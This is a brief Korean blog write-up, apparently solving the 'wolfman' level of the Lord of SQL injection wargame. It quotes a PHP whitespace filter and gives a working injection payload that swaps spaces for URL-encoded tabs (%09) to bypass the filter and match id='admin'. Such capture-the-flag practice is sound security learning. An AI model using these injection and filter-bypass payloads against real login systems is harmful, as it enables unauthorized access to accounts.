소스코드 분석
if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~");
공백을 사용못하게 하였다.
if($result['id'] == 'admin') solve("wolfman");
그리고 id='admin' 조건만 맞춰주면 풀리게되어있다.
space는 아스키값으로 20(Hex)을 넣어주게 되면
?pw=%27%20or%20id=%27admin
pw='%20or%20id='admin
풀리지 않는다.
그럼 Space를 대체할 문자를 넣어야하는데, 비슷한 Tab(09)을 넣게되면 풀린다.
?pw=%27%09or%09id=%27admin
pw='%09or%09id='admin
'WarGame > Web' 카테고리의 다른 글
| [Lord of SQL injection] orge (0) | 2017.05.25 |
|---|---|
| [Lord of SQL injection] darkelf (0) | 2017.05.25 |
| [Lord of SQL injection] orc (0) | 2017.05.24 |
| [Lord of SQL injection] goblin (0) | 2017.05.24 |
| [Lord of SQL injection] cobolt (0) | 2017.05.23 |
